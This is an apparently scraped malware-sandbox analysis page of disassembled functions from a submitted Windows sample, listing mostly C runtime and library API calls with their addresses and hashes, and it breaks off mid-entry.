Part of subcall function 00634EB1: GetLastError.KERNEL32(?,00000008,00639482), ref: 00634EB5
Part of subcall function 00634EB1: SetLastError.KERNEL32(00000000,0064C480,00000024,00630419), ref: 00634F57

EnumSystemLocalesW.KERNEL32(0063C280,00000001,?,?,?,0063CAEB,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0063C35E

Memory Dump Source

Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 942c3677e4747b263f9926eee5e1e3297c00e02ee00a3aee5d9134401cb493fa
Instruction ID: 012472405a2aa7261b33c4cadbd44124ecf00871748a94682a65363ed2a3e98b
Opcode Fuzzy Hash: 942c3677e4747b263f9926eee5e1e3297c00e02ee00a3aee5d9134401cb493fa
Instruction Fuzzy Hash: 82F0E53A30030557DB149F75DC45AAABF96EFC1B70F064058FA098B790C6719942C7D0

Function 00627AAF Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00007ABB,00626DC9), ref: 00627AB4

Memory Dump Source

Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: dd41b8ec75ebc3062ae16d529f0e7698ebe5900682256dd735263e4e796cae81
Instruction ID: ee8078f77be02082b666f5c81f76857b16c12b1e54a584d0f0fec84b23fac791
Opcode Fuzzy Hash: dd41b8ec75ebc3062ae16d529f0e7698ebe5900682256dd735263e4e796cae81
Instruction Fuzzy Hash:

Function 00621D79 Relevance: 1.4, Strings: 1, Instructions: 156COMMON

Download Yara Rule

Strings

Z81xbyuAua, xrefs: 00621E9B

Memory Dump Source

Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID:
String ID: Z81xbyuAua
API String ID: 0-3121583705
Opcode ID: 8c4b5a692fceb3c9df64d322c580bf3f7cee7e0dc8515aa19441b2ff124f8f00
Instruction ID: 6bcf530c4370c70237f10152bb4fdb596af274980dd08a022e37b27a9a57aa18
Opcode Fuzzy Hash: 8c4b5a692fceb3c9df64d322c580bf3f7cee7e0dc8515aa19441b2ff124f8f00
Instruction Fuzzy Hash: E7413B76E2453B5BCB4CEEB898560EBBB65EB56310B01427ADD50DF3D1E2348A01CAD4

Function 0063CC4B Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0063CC4B

Memory Dump Source

Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: b40f3fb367538d78ad4b5eb3b512996c64f6716ecd4be1e5370eda9a1e737c90
Instruction ID: 4050ebbc924c18cbf125260df4714e2df03bea854e8e03dccaa6acd57d43fc42
Opcode Fuzzy Hash: b40f3fb367538d78ad4b5eb3b512996c64f6716ecd4be1e5370eda9a1e737c90
Instruction Fuzzy Hash: AEA011302022008B8B008F38AF0A2083AEAAA0E280308A02AA000C2220EB208080AA00

Function 0063BB36 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
String ID:
API String ID: 3471368781-0
Opcode ID: 36283cf9cd79c63a4a3f221dd9018c2e044bab8d9b0c9ae96b33d505ab8631be
Instruction ID: 74b82f8028c3b7a84aac09e2c7ce275843a690cbec4099f355628304900b9df5
Opcode Fuzzy Hash: 36283cf9cd79c63a4a3f221dd9018c2e044bab8d9b0c9ae96b33d505ab8631be
Instruction Fuzzy Hash: 67B108356007059BDB389F25CC92BF7B3AAEF44308F14542DEB47C6681EB75A982CB90

Function 0063A64C Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d30a52f00f890bd01d6e84b1357bca7669443c8ff688bb46904ed1c21e63159d
Instruction ID: 12210fc181ade283cb6a1e10f919da3700f3bfb6863a246bf12cfd8629fb2f49
Opcode Fuzzy Hash: d30a52f00f890bd01d6e84b1357bca7669443c8ff688bb46904ed1c21e63159d
Instruction Fuzzy Hash: 38E08C32921238EBCB14DBD8C94598AF3EDEB45B04F15449AB501D3210C271DE00D7D0

Function 00666628 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90

Function 00622003 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f762b7d524804140333cdee9646699af19493c89fd3e4bb69c51dfda8bef2c92
Instruction ID: da8b0b63c12a385a2789ff0eaa4c0f8e8b84b63f731f1063036368113eaa22c1
Opcode Fuzzy Hash: f762b7d524804140333cdee9646699af19493c89fd3e4bb69c51dfda8bef2c92
Instruction Fuzzy Hash: 91D0953A601A149FC320CF09E940941F7BAFB99A30B1681A6E904A3B20C330FC02CAE0

Function 00630F2E Relevance: .0, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f509db719341cefea6c6c824f556d87c4149af31b656ab04d21882e9f704e7b0
Instruction ID: 737288202c6fce1b44fd6b50589cb913947b779920ca9ad36b3bb5bfe98afbc0
Opcode Fuzzy Hash: f509db719341cefea6c6c824f556d87c4149af31b656ab04d21882e9f704e7b0
Instruction Fuzzy Hash: 45C08C3400090096DE39891083723E43357ABA3782F8404CCDC1A0B742C51E9C8AEA81

Function 006253B1 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 006253B8
std::_Lockit::_Lockit.LIBCPMT ref: 006253C2
int.LIBCPMT ref: 006253D9

Part of subcall function 006216B4: std::_Lockit::_Lockit.LIBCPMT ref: 006216C5
Part of subcall function 006216B4: std::_Lockit::~_Lockit.LIBCPMT ref: 006216DF

std::_Facet_Register.LIBCPMT ref: 00625413
std::_Lockit::~_Lockit.LIBCPMT ref: 00625433
Concurrency::cancel_current_task.LIBCPMT ref: 00625440

Strings

R[b, xrefs: 00625420

Memory Dump Source

Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID: R[b
API String ID: 55977855-1787471655
Opcode ID: 523447c57a64fe32dcc82c54c8cc6cd992a77cca53f98d9c5aadd843cf24cc60
Instruction ID: c2a349b8162c66daa159f2ba5242c04bbcdec1dc8342bdc65eebf89571d2a7de
Opcode Fuzzy Hash: 523447c57a64fe32dcc82c54c8cc6cd992a77cca53f98d9c5aadd843cf24cc60
Instruction Fuzzy Hash: FE119075914E349BCB60EF64A8056BEB7A7AF55320F14050DE802AB791DF70AE408F89

Function 0062A5C8 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 303
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

type_info::operator==.LIBVCRUNTIME ref: 0062A6E7
___TypeMatch.LIBVCRUNTIME ref: 0062A7F5
CallUnexpected.LIBVCRUNTIME ref: 0062A962

Strings

csm, xrefs: 0062A71E
csm, xrefs: 0062A605
csm, xrefs: 0062A672

Memory Dump Source

Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID: CallMatchTypeUnexpectedtype_info::operator==
String ID: csm$csm$csm
API String ID: 1206542248-393685449
Opcode ID: b05a0bd603589c9e1113c9173d035de071246e877dcd5e9f354ae0dd971d84a9
Instruction ID: c42aa8c8c2bb557ea9ca0b777ac6711955d8ab45014661a09cfb2462fbf22ed1
Opcode Fuzzy Hash: b05a0bd603589c9e1113c9173d035de071246e877dcd5e9f354ae0dd971d84a9
Instruction Fuzzy Hash: 1CB19A31C00A29EFCF14DFE4E9819AEB7B6BF14310B15815AE8116B302D7B5DA52CF96

Function 00635F4A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,F8250000,?,0C77E109,?,00636057,0062C446,?,F8250000,00000000), ref: 0063600B

Strings

api-ms-, xrefs: 00635FA1
ext-ms-, xrefs: 00635FB5

Memory Dump Source

Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: be29ca317abe8019e22d40ee29070ab8eb559044b4e085d933f83a2a3c67ada5
Instruction ID: b6d08282ab21699bc9384e1d014d91b82c8acbaf2be7fa22f66f3296324042ed
Opcode Fuzzy Hash: be29ca317abe8019e22d40ee29070ab8eb559044b4e085d933f83a2a3c67ada5
Instruction Fuzzy Hash: F021DD35A00520A7C7319F64DD45AAE77ABAF42760F251219F917EB3D1DB30ED01CAE0

Function 0062507A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00625081
std::_Lockit::_Lockit.LIBCPMT ref: 0062508C
std::locale::_Setgloballocale.LIBCPMT ref: 006250A7
_Yarn.LIBCPMT ref: 006250BD
std::_Lockit::~_Lockit.LIBCPMT ref: 006250FA

Strings

R[b, xrefs: 006250C9, 006250ED

Memory Dump Source

Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$H_prolog3Lockit::_Lockit::~_SetgloballocaleYarnstd::locale::_
String ID: R[b
API String ID: 156189095-1787471655
Opcode ID: 50b670a42820a248f090bc160e4147c39f6c9cd3cff861627510d300eaf7563d
Instruction ID: 9480c8c3cee7d6071b0768aeeea18357830e71e96029decf27a5d8f7b09ad571
Opcode Fuzzy Hash: 50b670a42820a248f090bc160e4147c39f6c9cd3cff861627510d300eaf7563d
Instruction Fuzzy Hash: 63019A39A009748BC705AF20E955ABC7B63BF86340B54500EE80257381CF74AA02CF89

Function 00630F50 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,0C77E109,?,?,00000000,00641FC8,000000FF,?,00630EE0,00631010,?,00630EB4,00000000), ref: 00630F85
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00630F97
FreeLibrary.KERNEL32(00000000,?,?,00000000,00641FC8,000000FF,?,00630EE0,00631010,?,00630EB4,00000000), ref: 00630FB9

Strings

CorExitProcess, xrefs: 00630F8F
R[b, xrefs: 00630FA8
mscoree.dll, xrefs: 00630F7E

Memory Dump Source

Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$R[b$mscoree.dll
API String ID: 4061214504-2078170047
Opcode ID: d798ed87ba449eafad280a904f67609cc9019543d859b2f470760936b6d33a0f
Instruction ID: 7cf4a7bf189d98a1fd36abae418da590877604629a635be1648c04bb0985fd0b
Opcode Fuzzy Hash: d798ed87ba449eafad280a904f67609cc9019543d859b2f470760936b6d33a0f
Instruction Fuzzy Hash: 45016275944625EFDB219F54DC09FEEBBBAFB06F14F040629FC11A2390DB749904CA90

Function 0063F356 Relevance: 9.3, APIs: 6, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c16a1f3bef3a7cefb00e8d767d6fcd85b4482d64acbadc8f00132bd4a834217
Instruction ID: 037c399848f5dbcf191d14dd091d466f9e7f2d7d0d495e89f41f4b3348e30671
Opcode Fuzzy Hash: 2c16a1f3bef3a7cefb00e8d767d6fcd85b4482d64acbadc8f00132bd4a834217
Instruction Fuzzy Hash: E8B1E270E04649AFDB11DFA9E881BAD7BB7EF46310F144169E4019B3A2CB719D42CFA1

Function 0062A25A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0062A251,00628978,00627AFF), ref: 0062A268
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0062A276
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0062A28F
SetLastError.KERNEL32(00000000,0062A251,00628978,00627AFF), ref: 0062A2E1

Memory Dump Source

Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: fbd03160ce1bfc4f94f0ad09353c1d47d253c437bc7d7565ba1aa013defacc91
Instruction ID: 2035a19a560ddead550e55e8949f3b4d6fedd1b00c93118f0d9b956ad20f1a97
Opcode Fuzzy Hash: fbd03160ce1bfc4f94f0ad09353c1d47d253c437bc7d7565ba1aa013defacc91
Instruction Fuzzy Hash: DF01F53660EF32AF97543BF47D866A62787EB03F74B24532DF410522E1EF924D02594A

Function 0062A371 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 0062A438
___AdjustPointer.LIBCMT ref: 0062A45B
___AdjustPointer.LIBCMT ref: 0062A4F7

Strings

R[b, xrefs: 0062A3D0

Memory Dump Source

Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID: R[b
API String ID: 1740715915-1787471655
Opcode ID: 1140cfad6d06977655662a3bf037d8b24dbf69d00e817d75642c76956baf74a1
Instruction ID: 5e440a87e11486ffce2679f81c8f2e8c1ffa2b53bc96b23f3e8277ac6d1e68bb
Opcode Fuzzy Hash: 1140cfad6d06977655662a3bf037d8b24dbf69d00e817d75642c76956baf74a1
Instruction Fuzzy Hash: 2351DF72601A269FDB25AF94F845BBA73E7EF10310F24452DE80587292E7B1EC41CF92

Function 00624436 Relevance: 7.5, APIs: 5, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00624442
int.LIBCPMT ref: 00624455

Part of subcall function 006216B4: std::_Lockit::_Lockit.LIBCPMT ref: 006216C5
Part of subcall function 006216B4: std::_Lockit::~_Lockit.LIBCPMT ref: 006216DF

std::_Facet_Register.LIBCPMT ref: 00624488
std::_Lockit::~_Lockit.LIBCPMT ref: 0062449E
Concurrency::cancel_current_task.LIBCPMT ref: 006244A9

Memory Dump Source

Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: b316afacb64bcff1ca339fdd37669927ea77426a22303129ef143ce0898ae8b0
Instruction ID: 1d1cd82d31dd2efeb35345c93a5d97d5ba5aea67b4a0fc547872cd52d6a5bd64
